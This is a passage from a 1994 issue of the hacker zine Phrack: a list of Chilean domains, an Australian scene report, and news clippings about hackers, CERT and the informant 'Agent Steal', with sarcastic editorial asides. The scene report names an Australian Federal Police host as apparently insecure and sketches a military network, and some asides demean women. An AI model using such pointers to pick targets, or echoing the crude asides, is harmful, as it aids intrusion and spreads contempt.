  21817. datage.com.ar (unspecified)
  21818. guti.sld.ar (unspecified)
  21819. secyt.gov.ar (unspecified)
  21820. unisel.com.ar (unspecified)
  21821. unlp.edu.ar (universidad nacional de la plata, argentina)
  21822.  
  21823. CHILE:
  21824.  
  21825. altos.cl (altos chile limiteda. el corregidor, santiago, chile)
  21826. apple.cl (axis calderon, santiago, chile)
  21827. ars.cl (ars innovandi (el arte de innovar), chile)
  21828. bci.cl (unspecified)
  21829. campus.cl (indae limiteda. area de computacion, manuel montt, chile)
  21830. cepal.cl (comision economica para america latina (cepal) santiago, chile)
  21831. conicyt.cl (unspecified) <-- Government education branch
  21832. contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile)
  21833. cronus.cl (familia fuentealba olea, chile) <-- a family with their node!
  21834. difusion.cl (editorial difusion, chile)
  21835. eclac.cl (unspecified)
  21836. epson.cl (epson, chile)
  21837. eso.cl (european southern observatory la silla, la serena, chile)
  21838. frutex.cl (frutexport lota, santiago, chile)
  21839. fundch.cl (fundacion, chile)
  21840. fwells.cl (fundacion wells claro solar, casilla, temuco, chile)
  21841. gob.cl (unspecified)  <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet!
  21842. ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile)
  21843. lascar.cl (university of catolica, chile)
  21844. mic.cl (las condes, santiago, chile)
  21845. ncr.cl (national cash register corporation, chile)
  21846. opta.cl (opta limiteda. las violetas, idencia, santiago, chile)
  21847. orden.cl (orden huerfanos piso, fax, santiago, chile)
  21848. placer.cl (placer dome) <--- WHAT IS THIZ??? "Pleasure dome?" !!!!!!!!!!
  21849. puc.cl (catholic university of chile (universidad catolica de chile)
  21850. rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile)
  21851. safp.cl (superintendencia de administradoras de fondos de pensiones, chile)
  21852. scharfs.cl (scharfstein, las condes, santiago, chile)
  21853. sisteco.cl (sisteco, santiago, chile)
  21854. sonda.cl (sonda digital teatinos, santiago, chile)
  21855. tes.cl (d.c.c. sistemas, chile)
  21856. uai.cl (unspecified)
  21857. ubiobio.cl (unspecified)
  21858. uchile.cl (universidad de chile)
  21859. ucv.cl (unspecified)
  21860. udec.cl (universidad de concepcion de ingenieria de sistemas,)
  21861. unisys.cl (unisys, chile)
  21862. unorte.cl (universidad del norte, antofagasta, chile)
  21863. usach.cl (universidad de santiago de chile de ingenieria informatica,)
  21864. uta.cl (universidad de tarapaca, arica, chile)
  21865. utfsm.cl (universidad tecnica de electronica, valparaiso, chile)
  21866. ac.cam.cl (unspecified)
  21867. agr.puc.cl (agriculture department, catholic university of chile
  21868. astro.puc.cl (catholic university of chile (pontificia universidad catolica
  21869. bio.puc.cl (catholic university of chile santiago)
  21870. cec.uchile.cl (universidad de chile)
  21871. cfm.udec.cl (universidad de concepcion, concepcion, chile)
  21872. dcc.uchile.cl (department o. de ciencias de la computacion)
  21873. dfi.uchile.cl (universidad de chile)
  21874. die.udec.cl (universidad de concepcion de ingenieria de sistemas)
  21875. dii.uchile.cl (universidad de chile)
  21876. dim.uchile.cl (universidad de chile)
  21877. dis.udec.cl (universidad de concepcion, concepcion, chile)
  21878. disca.utfsm.cl (universidad tecnica federico santa maria, chile)
  21879. dpi.udec.cl (universidad de concepcion de ingenieria de sistemas)
  21880. elo.utfsm.cl (universidad tecnica federico santa maria, )
  21881. finanzas.fundch.cl (fundacion, chile)
  21882. fis.utfsm.cl (universidad tecnica federico santa maria,)
  21883. inf.utfsm.cl (universidad tecnica federico santa maria,)
  21884. ing.puc.cl (engineering, catholic university of chile )
  21885. mat.puc.cl (mathematics department, catholic university of chile
  21886. mat.utfsm.cl (universidad tecnica federico santa maria,
  21887. qui.puc.cl (catholic university of chile  santiago)
  21888. seci.uchile.cl (universidad de chile)
  21889. soft.udec.cl (universidad de concepcion de ingenieria de sistemas,)
  21890. -----------------------------------------------------------------------------
  21891.  
  21892. Australian Scene Report Part II
  21893. by Data King
  21894. -------------------------------
  21895.  
  21896. This is the sequel to the Australian scene report that appeared in Phrack
  21897. Issue 45. There have been a few developments since I wrote that report which I
  21898. think people may be interested in.
  21899.  
  21900. Old NEWS
  21901. ~~~~~~~~
  21902. But first before I deal with what's new, I need to deal with something that's
  21903. old. Shortly after Phrack 45 was published, I received a fakemail that
  21904. basically threatened me and also made a lot of claims, I would like to take
  21905. this opportunity to reply to the author of this letter.
  21906.  
  21907. First of all this person claims I have not been in the scene for ages, well
  21908. if I am not in the scene that is news to me!
  21909.  
  21910. The letter contained several threats to do something like redirect my
  21911. telephone number to a 0055 number, for people outside of Australia, a 0055
  21912. is a recorded timed call service.
  21913.  
  21914. To this I say: 'Go ahead, if your capable DO IT!'
  21915.  
  21916. I wont bother dealing with most of the rubbish contained in the article, it
  21917. was just general BS.
  21918.  
  21919. Finally I have something to say directly to the person who wrote the mail:
  21920. "If your so goddamn good, then don't hide behind fakemail, come out in the
  21921. open and let us all fear you, come one get your lame ass on IRC and lets talk!"
  21922.  
  21923. Also I was told not to submit anything more to Phrack for publishing or bad
  21924. things would happen, Well I guess either I have no phear, or I don't take
  21925. these threats seriously.
  21926.  
  21927.  
  21928. New NEWS
  21929. ~~~~~~~~
  21930. AusCERT
  21931.  
  21932. Australia is forming it's own version of CERT, to be called AusCERT and
  21933. based in Queensland, Australia. Everybody is shaking in their boots worrying
  21934. - NOT!
  21935.  
  21936. Networks
  21937.  
  21938. In the last report you may remember I talked about the Australia Military
  21939. Network in a very vague fashion, well now I have some more detailed info for
  21940. you.
  21941.  
  21942. The Australian Defense Forces (ADF) have what they call "the Defense
  21943. Integrated Secure Communications Network (DISCON)". This network is
  21944. relatively new. Circuit switched operations only began in 1990. Packet
  21945. switching came into effect during 1992.
  21946.  
  21947. It provides all the ADF's communication needs in terms of data, voice,
  21948. video, and so on, secure and non secure communications.
  21949.  
  21950. Main control is exercised from Canberra (believed to be from within the DSD
  21951. compound at Russell Offices), and the network is interconnected via a total
  21952. of 11 ground stations across the country using Aussat.
  21953.  
  21954. Also the Australian Federal Police have an internet connection now.
  21955. sentry.afp.gov.au is the main machine from what I can tell, from the looks
  21956. of it, the machine is either a setup or they don't know much about security.
  21957.  
  21958. NeuroCon
  21959.  
  21960. There was a Con organized by The Pick held here in Melbourne a little while
  21961. ago, from all reports it was a total disaster, once again showing the apathy
  21962. of Australian people in the scene.
  21963.  
  21964. For Instance the organizers kept the location secret, and where supposed to
  21965. pick people up in the city, at several allocated times they did not show up.
  21966.  
  21967. When one of the potential attendees rang and asked what was going on they
  21968. were told by the organizers: "We are too drunk to come and get you".
  21969.  
  21970. Come on guys this is LAME, sure everyone likes a drink, but if you keep the
  21971. location secret, make sure someone is able to go and get the people waiting
  21972. to be picked up!
  21973.  
  21974. HackFEST 94
  21975.  
  21976. The Year is quickly approaching an end and as yet I have not managed to
  21977. fully organize this event. I am in need of people who wish to speak on various
  21978. topics, so if you are so inclined and have an idea, send me mail and we will
  21979. see what we can organize.
  21980.  
  21981. As always I can be contacted at dking@suburbia.apana.org.au, but please note
  21982. my PGP signature has changed, so please do a finger on the account if you want
  21983. my new PGP signature.
  21984.  
  21985. Information in this article has come from various sources, but they shall
  21986. remain nameless as they do not wish the attention of the AFP. They know who
  21987. they are, and I send them my thanks - Thanks Guys!
  21988.                               ==Phrack Magazine==
  21989.  
  21990.                  Volume Five, Issue Forty-Six, File 28 of 28
  21991.  
  21992.               PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
  21993.               PWN                                             PWN
  21994.               PWN              Phrack World News              PWN
  21995.               PWN                                             PWN
  21996.               PWN        Compiled by Datastream Cowboy        PWN
  21997.               PWN                                             PWN
  21998.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  21999.  
  22000. Damn The Torpedoes                                            June 6, 1994
  22001. ~~~~~~~~~~~~~~~~~~
  22002. by Loring Wirbel (Electronic Engineering Times) (Page 134)
  22003.  
  22004. On May 3, a gargantuan satellite was launched with little press coverage
  22005. from Cape Canaveral.
  22006.  
  22007. The $1.5 billion satellite is a joint project of the NSA and the
  22008. National Reconnaissance Office.  At five tons, it is heavy enough to
  22009. have required every bit of thrust its Titan IV launcher could
  22010. provide--and despite the boost, it still did enough damage to the
  22011. launch-pad water main to render the facility unusable for two months.
  22012.  
  22013. The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an
  22014. antenna larger than a football field to carry out "hyper-spectral
  22015. analysis" -- Reconnaissance Office buzzwords for real-time analysis of
  22016. communications in a very wide swath of the electromagnetic spectrum.
  22017.  
  22018. Clipper and Digital Signature Standard opponents should be paying
  22019. attention to this one.  Mentor surprised space analysts by moving into a
  22020. geostationary rather than geosynchronous orbit.  Geostationary orbit
  22021. allows the satellite to "park" over a certain sector of the earth.
  22022.  
  22023. This first satellite in a planned series was heading for the Ural
  22024. Mountains in Russia at last notice.  Additional launches planned for
  22025. late 1994 will park future Mentors over the western hemisphere.
  22026.  
  22027. According to John Pike of the Federation of American Scientists, those
  22028. satellites will likely be controlled from Buckley Field (Aurora,
  22029. Colorado), an NSA/Reconnaissance downlink base slated to become this
  22030. hemisphere's largest intelligence base in the 1990s.
  22031.  
  22032. [Able to hear a bug fart from space.  DC to Daylight realtime analysis.
  22033.  And you Clipper whiners cry about someone listening to your phone calls.
  22034.  Puh-lease.]
  22035.  
  22036. -----------------------------------------------------------------------------
  22037.  
  22038. Discovery of 'Data Processing Virus Factory' In Italy       February 17, 1994
  22039. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22040. AFP Sciences
  22041.  
  22042. It was learned in Rome on 10 February that a data processing virus
  22043. "factory" -- in fact, a program called VCL (Viruses Creation Laboratory),
  22044. capable of triggering a virus epidemic--was discovered in Italy
  22045.  
  22046. Mr. Fulvio Berghella, deputy directory-general of the Italian Institute
  22047. for Bank Data Processing Security (ISTINFORM), discovered what it takes
  22048. to enable just about anybody to fabricate data processing viruses; he told
  22049. the press that its existence had been suspected for a year and a half and
  22050. that about a hundred Italian enterprises had been "contaminated."
  22051.  
  22052. An investigation was launched to try to determine the origin of the program,
  22053. said Mr. Alessandro Pansa, chief of the "data processing crime" section
  22054. of the Italian police.  Several copies of VCL were found in various places,
  22055. particularly in Rome and Milan.
  22056.  
  22057. Producing viruses is very simple with the help of this program, but it is
  22058. not easy to find.  A clandestine Bulgarian data bank, as yet not identified,
  22059. reportedly was behind all this.  An international meeting of data processing
  22060. virus "hunters" was organized in Amsterdam on 12 February to draft
  22061. a strategy; an international police meeting on this subject will be held
  22062. next week in Sweden.
  22063.  
  22064. Since 1991, the number of viruses in circulation throughout the world
  22065. increased 500% to a total of about 10,000 viruses.  In Italy, it is not
  22066. forbidden to own a program of this type, but dissemination of viruses
  22067. is prosecuted.
  22068.  
  22069. [So, I take it Nowhere Man cannot ever travel to Italy?]
  22070.  
  22071. --------------------------------------------------------------------------
  22072.  
  22073. DEFCON TV-News Coverage                                      July 26, 1994
  22074. by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles)
  22075.  
  22076. [Shot of audience]
  22077.  
  22078. Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal
  22079.    Eisner found at a gathering of hackers on the Las
  22080.    Vegas strip."
  22081.  
  22082. [Shot of "Welcome to Vegas" sign]
  22083. [Shot of Code Thief Deluxe v3.5]
  22084. [Shot of Dark Tangent talking]
  22085.  
  22086. Dark Tangent:           "Welcome to the convention!"
  22087.  
  22088. [Shot of Voyager hanging with some people]
  22089.  
  22090. Hal Eisner:             "Well not everyone was welcome to this year's
  22091.                         Def Con II, a national convention for hackers.
  22092.                         Certainly federal agents weren't."
  22093.  
  22094. [Shot DTangent searching for a fed]
  22095.  
  22096. Dark Tangent:           "On the right.  Getting closer."
  22097.  
  22098. Fed:                    "Must be me!  Thank you."
  22099.  
  22100. [Dark Tangent gives the Fed "I'm a Fed" t-shirt]
  22101.  
  22102. Hail Eisner:            "Suspected agents were ridiculed and given
  22103.                         identifying t-shirts. While conventioneers, some of
  22104. [Shot of someone using a laptop]
  22105.                         which have violated the law, and many of which are
  22106. [Shot of some guy reading the DefCon pamphlet]
  22107.                         simply tech-heads hungry for the latest theory, got
  22108. [Shot of a frequency counter, and a scanner]
  22109.                         to see a lot of the newest gadgetry, and hear some
  22110.                         tough talk from an Arizona Deputy DA that
  22111. [Shot of Gail giving her speech]
  22112.                         specializes on computer crime and actually
  22113.                         recognized some of her audience."
  22114.  
  22115. Gail:                   "Some people are outlaws, crooks, felons maybe."
  22116.  
  22117. [Shot back of conference room. People hanging]
  22118.  
  22119. Hal Eisner:             "There was an Alice in Wonderland quality about all
  22120.                         of this. Hackers by definition go where they are not
  22121.                         invited, but so is the government that is trying to
  22122.                         intrude on their privacy."
  22123.  
  22124. Devlin:                 "If I want to conceal something for whatever reason.
  22125.                         I'd like to have the ability to."
  22126.  
  22127. Hal Eisner:             "The bottom line is that many of the people here
  22128.                         want to do what they want, when they want, and how
  22129.                         they want, without restrictions."
  22130.  
  22131. Deadkat:                "What we are doing is changing the system, and if you
  22132.                         have to break the law to change the system, so be it!"
  22133.  
  22134. Hal Eisner:             "That's from residents of that cyberspacious world
  22135. [Shot of someone holding a diskette with what is supposed to be codez on the
  22136. label]
  22137.                         of behind the computer screen where the shy can be
  22138. [Code Thief on the background]
  22139.                         dangerous.  Reporting from Las Vegas, Hal Eisner,
  22140.                         Real News.
  22141.  
  22142. ------------------------------------------------------------------------------
  22143.  
  22144. Cyber Cops                                                        May 23, 1994
  22145. ~~~~~~~~~~
  22146. by Joseph Panettieri (Information Week) (Page 30)
  22147.  
  22148. When Chris Myers, a software engineer at Washington University in
  22149. St. Louis, arrived to work one Monday morning last month, he realized
  22150. something wasn't quite right.  Files had been damaged and a back door
  22151. was left ajar.  Not in his office, but on the university's computer network.
  22152.  
  22153. Like Commissioner Gordon racing to the Batphone, Myers swiftly called the
  22154. Internet's guardian, the Computer Emergency Response Team (CERT).
  22155.  
  22156. The CERT team boasts impressive credentials.  Its 14 team members are
  22157. managed by Dain Gary, former director of corporate data security at
  22158. Mellon Bank Corp. in Pittsburgh.  While Gary is the coach of the CERT
  22159. squad, Moira West is the scrambling on-field quarterback.  As manager
  22160. of CERT's incident-response team and coordination center, she oversees
  22161. the team's responses to attacks by Internet hackers and its search for
  22162. ways to reduce the Internet's vulnerabilities.  West was formerly a
  22163. software engineer at the University of York in England.
  22164.  
  22165. The rest of the CERT team remains in the shadows.  West says
  22166. the CERT crew hails from various information-systems backgrounds,
  22167. but declines to get more specific, possibly to hide any Achilles'
  22168. heels from hackers.
  22169.  
  22170. One thing West stresses is that CERT isn't a collection of reformed
  22171. hackers combing the Internet for suspicious data.  "People have to
  22172. trust us, so hiring hackers definitely isn't an option," she says.
  22173. "And we don't probe or log-on to other people's systems."
  22174.  
  22175. As a rule, CERT won't post an alert until after it finds a
  22176. remedy to the problem.  But that can take months, giving hackers
  22177. time to attempt similar breakins on thousands of Internet hosts
  22178. without fear of detection.  Yet CERT's West defends this policy:
  22179. "We don't want to cause mass hysteria if there's no way to
  22180. address a new, isolated problem.  We also don't want to alert the
  22181. entire intruder community about it."
  22182.  
  22183. ------------------------------------
  22184. Who You Gonna Call?
  22185. How to reach CERT
  22186.  
  22187. Phone: 412-268-7090
  22188. Internet: cert@cert.org
  22189. Fax: 412-268-6989
  22190. Mail: CERT Coordination Center
  22191.       Software Engineering Institute
  22192.       Carnegie Mellon University
  22193.       Pittsburgh, PA 15213-3890
  22194. ------------------------------------
  22195.  
  22196. [Ask for that saucy British chippie.  Her voice will melt you like
  22197.  butter.
  22198.  
  22199.  CERT -- Continually re-emphasizing the adage:  "You get what you pay for!"]
  22200.  
  22201.  And remember, CERT doesn't hire hackers, they just suck the juicy bits
  22202.  out of their brains for free.
  22203.  
  22204. ------------------------------------------------------------------------------
  22205.  
  22206. Defining the Ethics of Hacking                                 August 12, 1994
  22207. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22208. by Amy Harmon (Los Angeles Times) (page A1)
  22209.  
  22210. Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer
  22211. hackers and phone phreaks -- is having a party.
  22212.  
  22213. And perhaps it is just in time. 2600, the hacker magazine Corley
  22214. started when he was 23, is a decade old. It has spawned monthly
  22215. hacker meetings in dozens of cities. It has been the target of a
  22216. Secret Service investigation. It has even gone aboveground, with
  22217. newsstand sales of 20,000 last year.
  22218.  
  22219. As hundreds of hackers converge in New York City this weekend to celebrate
  22220. 2600's anniversary, Corley hopes to grapple with how to uphold the
  22221. "hacker ethic," an oxymoron to some, in an era when many of 2600's devotees
  22222. just want to know how to make free phone calls.  (Less high-minded
  22223. activities -- like cracking the New York City subway's new electronic
  22224. fare card system -- are also on the agenda).
  22225.  
  22226. Hackers counter that in a society increasingly dependent on
  22227. technology, the very basis for democracy could be threatened by limiting
  22228. technological exploration. "Hacking teaches people to think critically about
  22229. technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers
  22230. on Planet Earth conference this weekend. "The corporations that are building
  22231. the technology are certainly not going to tell us, because they're trying to
  22232. sell it to us. Whole societies are trusting technology blindly -- they just
  22233. believe what the technocrats say."
  22234.  
  22235. Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic,
  22236. which made waves this year with an article showing that while tapping mobile
  22237. phones of criminal suspects with radio scanners, Dutch police tapped into
  22238. thousand of other mobile phones.
  22239.  
  22240. "What society needs is people who are independent yet knowledgeable,"
  22241. Gonggrijp said. 'That's mostly going to be young people, which society is
  22242. uncomfortable with. But there's only two groups who know how the phone and
  22243. computer systems work, and that's engineers and hackers. And I think that's
  22244. a very healthy situation."
  22245.  
  22246. [By the way Amy:  Phrack always grants interviews to cute, female
  22247.  LA Times reporters.]
  22248.  
  22249. ------------------------------------------------------------------------------
  22250.  
  22251. Fighting Telephone Fraud                                        August 1, 1994
  22252. ~~~~~~~~~~~~~~~~~~~~~~~~
  22253. by Barbara DePompa (Information Week) (Page 74)
  22254.  
  22255. Local phone companies are taking an active role in warning customers of
  22256. scams and cracking down on hackers.
  22257.  
  22258. Early last month, a 17-year old hacker in Baltimore was caught
  22259. red-handed with a list of more than 100 corporate authorization codes that
  22260. would have enabled fraud artists to access private branch exchanges and
  22261. make outgoing calls at corporate expanse.
  22262.  
  22263. After the teenager's arrest, local police shared the list with Bell
  22264. Atlantic's fraud prevention group. Within hours, the phone numbers were
  22265. communicated to the appropriate regional phone companies and corporate
  22266. customers on the list were advised to either change their authorization
  22267. codes or shut down outside dialing privileges.
  22268.  
  22269. "We can't curb fraud without full disclosure and sharing this type
  22270. of vital information" points out Mary Chacanias, manager of
  22271. telecommunications fraud prevention for Bell Atlantic in Arlington, VA.
  22272.  
  22273. -----------------------------------------------------------------------------
  22274.  
  22275. AT&T Forms Team to Track Hackers                              August 30, 1994
  22276. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22277. (Reuters News Wire)
  22278.  
  22279. AT&T Corp.'s Global Business Communications Systems subsidiary said
  22280. Wednesday it has formed an investigative unit to monitor, track and
  22281. catch phone-system hackers in the act of committing toll fraud.
  22282.  
  22283. The unit will profile hacker activity and initiate "electronic
  22284. stakeouts" with its business communications equipment in cooperation
  22285. with law enforcement agencies, and work with them to prosecute the
  22286. thieves.
  22287.  
  22288. "We're in a shoot-out between 'high-tech cops' -- like AT&T -- and
  22289. 'high-tech robbers' who brazenly steal long distance service from our
  22290. business customers," said Kevin Hanley, marketing director for business
  22291. security systems for AT&T Global Business.
  22292.  
  22293. "Our goal is not only to defend against hackers but to get them off the
  22294. street."
  22295.  
  22296. [Oh my God.  Are you scared?  Have you wet yourself?  YOU WILL!]
  22297.  
  22298. -----------------------------------------------------------------------------
  22299.  
  22300. Former FBI Informant a Fugitive                                 July 31, 1994
  22301. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22302. by Keith Stone (Daily News)
  22303.  
  22304. Computer outlaw Justin Tanner Petersen and prosecutors
  22305. cut a deal:  The Los Angeles nightclub promoter known in
  22306. the computer world as "Agent Steal" would work for the
  22307. government in exchange for freedom.
  22308.  
  22309. With his help, the government built its case against
  22310. Kevin Lee Poulsen, a Pasadena native who pleaded guilty
  22311. in June to charges he electronically rigged telephones at
  22312. Los Angeles radio stations so he could win two Porsches,
  22313. $22,000 and two trips to Hawaii.
  22314.  
  22315. Petersen also provided information on Kevin Mitnick, a
  22316. Calabasas man wanted by the FBI for cracking computer and
  22317. telephone networks at Pacific Bell and the state Department
  22318. of Motor Vehicles, according to court records.
  22319.  
  22320. Petersen's deal lasted for nearly two years - until
  22321. authorities found that while he was helping them undercover,
  22322. he also was helping himself to other people's credit cards.
  22323.  
  22324. Caught but not cornered, the 34-year-old "Agent Steal" had
  22325. one more trick: He admitted his wrongdoing to a prosecutor
  22326. at the Los Angeles U.S. Attorney's Office, asked to meet
  22327. with his attorney and then said he needed to take a walk.
  22328.  
  22329. And he never came back.
  22330.  
  22331. A month after Petersen fled, he spoke with a magazine for
  22332. computer  users about his role as an FBI informant, who he
  22333. had worked against and his plans for the future.
  22334.  
  22335. "I have learned a lot about how the bureau works.  Probably
  22336. too much," he said in an interview that Phrack Magazine published
  22337. Nov. 17, 1993.  Phrack is available on the Internet, a worldwide
  22338. network for computer users.
  22339.  
  22340. Petersen told the magazine that working with the FBI was fun
  22341. most of the time.  "There was a lot of money and resources used.
  22342. In addition, they paid me well," he said.
  22343.  
  22344. "If I didn't cooperate with the bureau," he told Phrack, "I
  22345. could have been charged with possession of government material."
  22346.  
  22347. "Most hackers would have sold out their mother," he added.
  22348.  
  22349. Petersen is described as 5 foot, 11 inches, 175 pounds, with
  22350. brown hair - "sometimes platinum blond."  But his most telling
  22351. characteristic is that he walks with the aid of a prosthesis
  22352. because he lost his left leg below the knee in a car accident.
  22353.  
  22354. Heavily involved in the Hollywood music scene, Petersen's
  22355. last known employer was Club "Velvet Jam," one of a string of
  22356. clubs he promoted in Los Angeles.
  22357.  
  22358. -----------------------------------------------------------------------------
  22359.  
  22360. Hacker in Hiding                                                July 31, 1994
  22361. ~~~~~~~~~~~~~~~~
  22362. by John Johnson (LA Times)
  22363.  
  22364. First there was the Condor, then Dark Dante.  The latest computer hacker to
  22365. hit the cyberspace most wanted list is Agent Steal, a slender, good-looking
  22366. rogue partial to Porsches and BMWs who bragged that he worked undercover
  22367. for the FBI catching other hackers.
  22368.  
  22369. Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run
  22370. from the very agency he told friends was paying his rent and flying him to
  22371. computer conferences to spy on other hackers.
  22372.  
  22373. Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors
  22374. that he had been committing further crimes during the time when he was
  22375. apparently working with the government "in the investigation of other
  22376. persons," according to federal court records.
  22377.  
  22378. Ironically, by running he has consigned himself to the same secretive life
  22379. as Kevin Mitnick, the former North Hills man who is one of the nation's most
  22380. infamous hackers, and whom Petersen allegedly bragged of helping to set up
  22381. for an FBI bust.  Mitnick, who once took the name Condor in homage to a
  22382. favorite movie character, has been hiding for almost two years to avoid
  22383. prosecution for allegedly hacking into computers illegally and posing as a
  22384. law enforcement officer.
  22385.  
  22386. Authorities say Petersen's list of hacks includes breaking into computers
  22387. used by federal investigative agencies and tapping into a credit card
  22388. information bureau.  Petersen, who once promoted after-hours rock shows in
  22389. the San Fernando Valley, also was involved in the hacker underground's most
  22390. sensational scam - hijacking radio station phone lines to win contests with
  22391. prizes ranging from new cars to trips to Hawaii.
  22392.  
  22393. Petersen gave an interview last year to an on-line publication called Phrack
  22394. in which he claimed to have tapped the phone of a prostitute working for
  22395. Heidi Fleiss.  He also boasted openly of working with the FBI to bust
  22396. Mitnick.
  22397.  
  22398. "When I went to work for the bureau I contacted him," Petersen said in the
  22399. interview conducted by Mike Bowen.  "He was still up to his old tricks, so
  22400. we opened a case on him. . . . What a loser.  Everyone thinks he is some
  22401. great hacker.  I outsmarted him and busted him."
  22402.  
  22403. In the Phrack interview, published on the Internet, an international network
  22404. of computer networks with millions of users, Agent Steal bragged about
  22405. breaking into Pacific Bell headquarters with Poulsen to obtain information
  22406. about the phone company's investigation of his hacking.
  22407.  
  22408. Petersen was arrested in Texas in 1991, where he lived briefly.  Court
  22409. records show that authorities searching his apartment found computer
  22410. equipment, Pacific Bell manuals and five modems.
  22411.  
  22412. A grand jury in Texas returned an eight-count indictment against Petersen,
  22413. accusing him of assuming false names, accessing a computer without
  22414. authorization, possessing stolen mail and fraudulently obtaining and using
  22415. credit cards.
  22416.  
  22417. The case was later transferred to California and sealed, out of concern for
  22418. Petersen's safety, authorities said.  The motion to seal, obtained by
  22419. Sherman, states that Petersen, "acting in an undercover capacity, currently
  22420. is cooperating with the United States in the investigation of other persons
  22421. in California."
  22422.  
  22423. In the Phrack interview, Petersen makes no apologies for his choices in life.
  22424.  
  22425. While discussing Petersen's role as an informant, Mike Bowen says, "I think
  22426. that most hackers would have done the same as you."
  22427.  
  22428. "Most hackers would have sold out their mother," Petersen responded.
  22429.  
  22430. ------------------------------------------------------------------------------
  22431.  
  22432. Computer Criminal Caught After 10 Months on the Run            August 30, 1994
  22433. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22434. by Keith Stone (Daily News)
  22435.  
  22436. Convicted computer criminal Justin Tanner Petersen was captured Monday in
  22437. Los Angeles, 10 months after federal authorities said they discovered he
  22438. had begun living a dual life as their informant and an outlaw hacker.
  22439.  
  22440. Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment
  22441. that FBI agents had placed under surveillance, said Assistant U.S.
  22442. Attorney David Schindler.
  22443.  
  22444. A flamboyant hacker known in the computer world as "Agent Steal," Petersen
  22445. was being held without bail in the federal detention center in Los Angeles.
  22446. U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing
  22447. for Oct. 31.
  22448.  
  22449. Petersen faces a maximum of 40 years in prison for using his sophisticated
  22450. computer skills to rig a radio contest in Los Angeles, tap telephone lines
  22451. and enrich himself with credit cards.
  22452.  
  22453. Monday's arrest ends Petersen's run from the same FBI agents with whom he
  22454. had once struck a deal: to remain free on bond in exchange for pleading
  22455. guilty to several computer crimes and helping the FBI with other hacker
  22456. cases.
  22457.  
  22458. The one-time nightclub promoter pleaded guilty in April 1993 to six federal
  22459. charges.  And he agreed to help the government build its case against Kevin
  22460. Lee Poulsen, who was convicted of manipulating telephones to win radio
  22461. contests and is awaiting trial on espionage charges in San Francisco.
  22462.  
  22463. Authorities said they later learned that Petersen had violated the deal by
  22464. committing new crimes even as he was awaiting sentencing in the plea
  22465. agreement.
  22466.  
  22467. On Monday, FBI agents acting on a tip were waiting for Petersen when he parked
  22468. a BMW at the Westwood apartment building.  An FBI agent called Petersen's
  22469. name, and Petersen began to run, Schindler said.
  22470.  
  22471. Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic
  22472. lower left leg because of a car-motorcycle accident several years ago.
  22473.  
  22474. In April 1993, Petersen pleaded guilty to six federal charges including
  22475. conspiracy, computer fraud, intercepting wire communications, transporting
  22476. a stolen vehicle across state lines and wrongfully accessing TRW credit
  22477. files.  Among the crimes that Petersen has admitted to was working with other
  22478. people to seize control of telephone lines so they could win radio
  22479. promotional contests.  In 1989, Petersen used that trick and walked away with
  22480. $10,000 in prize money from an FM station, court records show.
  22481.  
  22482. When that and other misdeeds began to catch up with him, Petersen said, he
  22483. fled to Dallas, where he assumed the alias Samuel Grossman and continued
  22484. using computers to make money illegally.
  22485.  
  22486. When he as finally arrested in 1991, Petersen played his last card.
  22487. "I called up the FBI and said: 'Guess what? I am in jail,' " he said.
  22488. He said he spent the next four months in prison, negotiating for his freedom
  22489. with the promise that he would act as an informant in Los Angeles.
  22490.  
  22491. The FBI paid his rent and utilities and gave him $200 a week for spending
  22492. money and medical insurance, Petersen said.
  22493.  
  22494. They also provided him with a computer and phone lines to gather information
  22495. on hackers, he said.
  22496.  
  22497. Eventually, Petersen said, the FBI stopped supporting him so he turned to
  22498. his nightclubs for income.  But when that began to fail, he returned to
  22499. hacking for profit.
  22500.  
  22501. "I was stuck out on a limb.  I was almost out on the street.  My club
  22502. was costing me money because it was a new club," he said.  "So I did what
  22503. I had to do.  I an not a greedy person."
  22504.  
  22505. [Broke, Busted, Distrusted.  Turning in your friends leads to some
  22506.  seriously bad Karma, man.  Negative energy like that returns ten-fold.
  22507.  You never know in what form either.  You could end getting shot,
  22508.  thrown in jail, or worse, test HIV Positive.  So many titty-dancers,
  22509.  so little time, eh dude?  Good luck and God bless ya' Justin.]
  22510.  
  22511. -----------------------------------------------------------------------------
  22512.  
  22513. Fugitive Hacker Baffles FBI With Technical Guile                 July 5, 1994
  22514. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22515. by John Markoff (New York Times)
  22516.  
  22517. [Mitnik, Mitnik, Mitnik, and more Mitnik.  Poor bastard.  No rest for
  22518.  the wicked, eh Kevin?]
  22519.  
  22520. -----------------------------------------------------------------------------
  22521.  
  22522. Computer Outlaws Invade the Internet                             May 24, 1994
  22523. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  22524. by Mike Toner (Atlanta Journal-Constitution)
  22525.  
  22526. A nationwide wave of computer break-ins has law enforcement
  22527. authorities scrambling to track down a sophisticated ring of
  22528. "hackers" who have used the international "information
  22529. highway," the Internet, to steal more than 100,000 passwords -- the
  22530. electronic keys to vast quantities of information stored on
  22531. government, university and corporate computer systems.
  22532.  
  22533. Since the discovery of an isolated break-in last year at a
  22534. single computer that provides a "gateway" to the Internet,
  22535. operators of at least 30 major computer systems have found illicit
  22536. password "sniffers" on their machines.
  22537.  
